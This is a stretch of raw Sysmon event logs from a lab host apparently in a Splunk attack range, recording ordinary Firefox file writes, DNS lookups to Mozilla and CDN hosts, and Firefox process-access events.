Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105514Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.766{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=E83766E3A5AD464339D3F0268E9573CB,SHA256=C04F99B7C59D7524F4E13EA2E132939B89E3FCDE3ED2C1FC64604F89EE016B16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105513Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.766{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105512Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.766{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=15F5B42A0607C9A021F485A1D079877B,SHA256=CFDF3398B1B2F8EC7888A11F00EB972E116C9BE566DF079C85CE265A9B03E05D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105511Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.766{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=6792001F3480B51B505F73805B7F029B,SHA256=06ECFF719737B5F4FF3AE43B54BC559C67975BD591275B815987F7FF2ED16348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105510Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.766{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=F2EB9D969F4F77422391D2389C2A06CA,SHA256=17BEC070162F13DAD7BA1641114E187793959B577CD3AE878FDA42D9D4938D0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105509Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.766{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=C8B1BB242E4EC7B6E0D143011EDDAD9D,SHA256=BDCC1C1520504A1CB67F442B41A0F0FCE202AF2B1235C00D563234AC6B6603D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105508Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.766{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=E775512D9597E7D9D3B99954430E8920,SHA256=74023EA7F596D4EB2AEFDBEAB8E2EB0C27AFF3E538BBFB5E5DFCB827780D2101,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105507Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=BF384E454E03086B11DEE012A128B9F6,SHA256=3763C67DF8647039704DBBADE465266DA2AFCC415C3C723ED7E5AFC28610BA25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105506Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=77508D497B27BB588F387C791BFA6A0C,SHA256=70C05A9FE711870D15971FD1E0575052C926544A2214DC54EA059522A53BBDB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105505Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=5E853EDF46A822EFC7287162ACB2E059,SHA256=19E23DDC60CB1B180F008258C6B1014C620215EC713B8546D803D8F2D8C1C064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105504Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=817E27BA56D6BD28B9BD2D901218466A,SHA256=D3F2218622D8749425209A2F9A74881F04585706C35199BCE825FECFCCC1F84A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105503Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.751{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+bf7923|C:\Program Files\Mozilla Firefox\xul.dll+bf6fc1|C:\Program Files\Mozilla Firefox\xul.dll+beec83|C:\Program Files\Mozilla Firefox\xul.dll+bf8370|C:\Program Files\Mozilla Firefox\xul.dll+fc0059|C:\Program Files\Mozilla Firefox\xul.dll+1a25bf8|C:\Program Files\Mozilla Firefox\xul.dll+b820d4|C:\Program Files\Mozilla Firefox\xul.dll+fdaf04|C:\Program Files\Mozilla Firefox\xul.dll+f46937|C:\Program Files\Mozilla Firefox\xul.dll+2cea6a|C:\Program Files\Mozilla Firefox\xul.dll+eb6c37|C:\Program Files\Mozilla Firefox\xul.dll+eb67ec|C:\Program Files\Mozilla Firefox\xul.dll+2b70e2|C:\Program Files\Mozilla Firefox\xul.dll+1ac273f|C:\Program Files\Mozilla Firefox\xul.dll+f1bcd0 23542300x8000000000000000105502Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=F13CC33FD8C5249B25BDF95E3C651EFC,SHA256=BDE1BEC3F86C3F270383CF1D4A6E2F0C9AE2EDB6AB5BDA3DF60088D350B355DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105501Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=9E925754CAF3A7195C95708604D5312B,SHA256=879FCC6BED244643A767240CC029E490D01ACAA68F415D417E2252FA34D32347,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105500Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=9817A9DF88F7FB7BE3C7CD394FEE8213,SHA256=4DB8BD5DB9A01B14D5749A13744A2B43EBC87190BA89C8C372D01D7B16E1F1FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105499Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walMD5=8DEB0E18A70501A5076929BD482B5551,SHA256=03AEABB8CC53BCCFBE5A23C75FDE23E0FA4EBFA22B1840BC8B1C1F160C6C8B50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105498Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=8B83474589F135CC7E9A315EAB1492DC,SHA256=1C8D34D24B51F1A71BC08660A12DA6D71C59CEA3A8688E41535C933FF9697D1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105497Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.751{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=8B83474589F135CC7E9A315EAB1492DC,SHA256=1C8D34D24B51F1A71BC08660A12DA6D71C59CEA3A8688E41535C933FF9697D1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105496Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.735{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=4E742FD4E2E241DF530C9A09EC998D93,SHA256=885552DB86642A631A6061543C657DEC24D364EDAB93B77DC81D8E2F1FF8E0DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105495Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.735{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=6648D0B4D78335F42E6A8AF25D68D4D3,SHA256=93C290162FFCA739EA7DF4C222916014BE5EC6FE39B0F8754C085F2D25E9F74D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105494Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.735{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=BAC4594A16A96B504C42529F65014033,SHA256=0B4DA8025DB51E18D0D595FF8C1A4663FFEF3F701BD28253D67B679CAE4EFC83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105493Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.735{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=7CD2B9EA760F6F21FDC678AEABA82920,SHA256=3132F8AB0F23FC0807105F2F5AB8447DEE35F542C2CE393A2D1DAB5731DBC281,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105492Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.735{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADC734C5C2CF430172DACD48FCCF8B5B,SHA256=FF4BA8B1746FDDFF6F0130B71D91E9E2CE21F105FF9E614F2A9D55104FEEDD9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105491Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.735{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=8C03721509BAD4CAE2B1E51D2CFF4702,SHA256=5C2E935805144AE50BEE261D3A9150E081A5CDB4D0C605033E8D8CA26113250B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105490Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.735{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=6ECA521D0182DD923D3A5DC474465ADB,SHA256=CAEB95F73ACAA38A287093D3FADD984AC9C78888059B76ABC3129CC0AA696FB5,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000105489Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.495{58E9C193-B422-615A-0602-00000000FC01}5552prod.ingestion-edge.prod.dataops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105488Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.491{58E9C193-B422-615A-0602-00000000FC01}5552prod.ingestion-edge.prod.dataops.mozgcp.net035.227.207.240;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105487Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.314{58E9C193-B422-615A-0602-00000000FC01}5552prod-classifyclient.normandy.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105486Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.290{58E9C193-B422-615A-0602-00000000FC01}5552prod-classifyclient.normandy.prod.cloudops.mozgcp.net034.98.75.36;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000105485Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.732{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=AAB30E277048E48F2A5565A1382EEADD,SHA256=9BD17F4798A2F384E2720EFD213FAD103D7943C3C2C9BC83EA77C9C2A5C3EEF1,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000105484Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.246{58E9C193-B422-615A-0602-00000000FC01}5552firefox.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000105483Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.732{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\ProgramData\Mozilla\updates\308046B0AF4A39CB\update-config.jsonMD5=FE74F5C38F433736EE7015868CFB159E,SHA256=3F7B3252EF3B6217AD78ADB7007738601CE1EEBCA69F55990B64BF254BD4FC63,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000105482Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.241{58E9C193-B422-615A-0602-00000000FC01}5552firefox.com044.236.72.93;44.235.246.155;44.236.48.31;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105481Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.240{58E9C193-B422-615A-0602-00000000FC01}5552firefox.com0::ffff:44.236.48.31;::ffff:44.236.72.93;::ffff:44.235.246.155;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105480Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.141{58E9C193-B422-615A-0602-00000000FC01}5552a1887.dscq.akamai.net02a02:26f0:1700:f::1737:a194;2a02:26f0:1700:f::1737:a1a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105479Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.139{58E9C193-B422-615A-0602-00000000FC01}5552a1887.dscq.akamai.net02.16.216.73;2.16.216.48;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105478Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.138{58E9C193-B422-615A-0602-00000000FC01}5552r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;::ffff:2.16.216.48;::ffff:2.16.216.73;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105477Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.905{58E9C193-B422-615A-0602-00000000FC01}5552www.mozilla.org.cdn.cloudflare.net02606:4700::6812:a522;2606:4700::6812:a422;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105476Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.901{58E9C193-B422-615A-0602-00000000FC01}5552www.mozilla.org.cdn.cloudflare.net0104.18.165.34;104.18.164.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105475Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.890{58E9C193-B422-615A-0602-00000000FC01}5552accounts.firefox.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105474Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.880{58E9C193-B422-615A-0602-00000000FC01}5552accounts.firefox.com035.161.231.170;35.166.84.75;52.88.96.248;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105473Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.878{58E9C193-B422-615A-0602-00000000FC01}5552accounts.firefox.com0::ffff:52.88.96.248;::ffff:35.161.231.170;::ffff:35.166.84.75;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105472Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.724{58E9C193-B422-615A-0602-00000000FC01}5552d2nxq2uap88usk.cloudfront.net02600:9000:211e:ee00:a:da5e:7900:93a1;2600:9000:211e:7a00:a:da5e:7900:93a1;2600:9000:211e:f800:a:da5e:7900:93a1;2600:9000:211e:9800:a:da5e:7900:93a1;2600:9000:211e:7c00:a:da5e:7900:93a1;2600:9000:211e:0:a:da5e:7900:93a1;2600:9000:211e:7200:a:da5e:7900:93a1;2600:9000:211e:9a00:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105471Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.708{58E9C193-B422-615A-0602-00000000FC01}5552d2nxq2uap88usk.cloudfront.net018.66.139.125;18.66.139.17;18.66.139.67;18.66.139.97;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105470Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.366{58E9C193-B422-615A-0602-00000000FC01}5552cs9.wac.phicdn.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105469Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:31.363{58E9C193-B422-615A-0602-00000000FC01}5552cs9.wac.phicdn.net093.184.220.29;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000105468Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.713{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83D9CB4FD4722656538E01AC39DB1160,SHA256=A66667635763346F3BA4179C275C50E49DDBF479B964A2E8D181176D1E57CF4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105467Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.713{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=36C45FD21E48C2E7DE26A75F00D23DA1,SHA256=9896D350524E7FB9CC832EE2D32EC12B05A8763292CDF55FE106304506A1F31D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105466Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.713{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=6C255AE3B93075CA1A8A5AE1EF5CA871,SHA256=45AF23B0B07D842908F3DEDECD477AD9902A506004688D3726F64D09E8C8FEE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105465Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.713{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=6996279C9EC2891C1435B1A1C5FA02D7,SHA256=0A8717A1FB2E2474B71A277ED92AAFFEDF71DF263F9BF589A7FF151FCDD795EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105464Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.698{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=237B8868935C792AA0FC6F097B9A46FD,SHA256=6D909287BFD9C96144C976DC66452695C315326B57B526DB8C46A37E66706418,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105463Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.698{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=4BC679C0E2851D07A18DAE03F0576009,SHA256=E9CEF261B7B36A1720F44DBE3B972C300B99E72BB2771C695E355FF72516A9C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105462Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.698{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=E6DB9066875C74B0177D7002B9739D2D,SHA256=588D5C45EC6FEDD81B9C4DB07E7C59205935D6D12A705CCE9AE45844651BBA01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105461Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.682{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0e190|C:\Program Files\Mozilla Firefox\xul.dll+c0db0d|C:\Program Files\Mozilla Firefox\xul.dll+c06b06|C:\Program Files\Mozilla Firefox\xul.dll+c0c010|C:\Program Files\Mozilla Firefox\xul.dll+c0c76b|C:\Program Files\Mozilla Firefox\xul.dll+39ae11|C:\Program Files\Mozilla Firefox\xul.dll+c0d539|C:\Program Files\Mozilla Firefox\xul.dll+c104f2|C:\Program Files\Mozilla Firefox\xul.dll+c0cf56|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+bedfc3|C:\Program Files\Mozilla Firefox\xul.dll+1f0f57c 10341000x8000000000000000105460Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:32.651{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla 